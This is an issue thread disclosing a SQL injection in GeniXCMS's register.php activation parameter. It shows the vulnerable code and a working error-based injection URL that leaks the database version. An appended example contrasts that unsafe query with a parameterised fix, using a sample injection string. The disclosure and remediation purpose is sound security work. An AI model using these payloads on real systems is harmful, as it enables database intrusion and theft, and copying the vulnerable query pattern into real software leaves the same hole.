SQL injection in register.php GeniXCMS v0.0.8(latest version) #69

Closed
Dliv3 opened this issue Jan 20, 2017 · 1 comment

Dliv3 commented Jan 20, 2017

/register.php

if (isset($_GET['activation'])) {
    # code...
    $usr = Db::result(sprintf("SELECT * FROM `user` WHERE `activation` = '%s' LIMIT 1", $_GET['activation'] ));

The activation param leads to a SQL injection vulnerability.
POC:

http://127.0.0.1/GeniXCMS/register.php?activation=1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)%23

We'll find the database version in the response page, which proves the vulnerability exists.

By the way, if you can help me apply for a CVE-ID, I will be very grateful. XD

semplon (Owner) commented Jan 20, 2017

This has been fixed with this commit: https://github.com/semplon/GeniXCMS/blob/master/register.php#L119

Thanks.
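An added example (not part of the issue thread, not GeniXCMS code, and not the project's actual fix) that puts the `activation` lookup pattern from the report next to a bound-parameter version. It assumes PDO with an in-memory SQLite table and a hex token format; the schema, data, function names and input values are constructed for illustration.

```php
<?php
// Added example, not GeniXCMS code. Constructed schema and data in an
// in-memory SQLite database (requires the pdo_sqlite extension).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE user (id INTEGER PRIMARY KEY, userid TEXT, activation TEXT)");
$pdo->exec("INSERT INTO user (userid, activation) VALUES ('alice', 'a3f1c9d27b5e4068')");

// Pattern from the issue: the request value is formatted into the SQL text,
// so a quote in it ends the string literal and the rest is parsed as SQL.
function findByActivationUnsafe(PDO $pdo, string $activation): ?array
{
    $sql = sprintf("SELECT * FROM user WHERE activation = '%s' LIMIT 1", $activation);
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened form: check the token shape first, then bind it as a parameter
// so the driver always treats it as data, never as SQL.
function findByActivation(PDO $pdo, string $activation): ?array
{
    // Assumed token format (lowercase hex, 16-64 chars); match the real generator.
    if (preg_match('/\A[a-f0-9]{16,64}\z/', $activation) !== 1) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM user WHERE activation = :activation LIMIT 1');
    $stmt->execute([':activation' => $activation]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$valid   = 'a3f1c9d27b5e4068';   // constructed token stored above
$crafted = "x' OR '1'='1";       // constructed input containing a quote

// Compare how each lookup treats the same inputs.
var_dump(findByActivationUnsafe($pdo, $crafted) !== null);
var_dump(findByActivation($pdo, $crafted) !== null);
var_dump(findByActivation($pdo, $valid)['userid'] ?? null);
```

The bound parameter alone closes the injection; the format check is an extra layer that rejects malformed tokens before any query runs.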
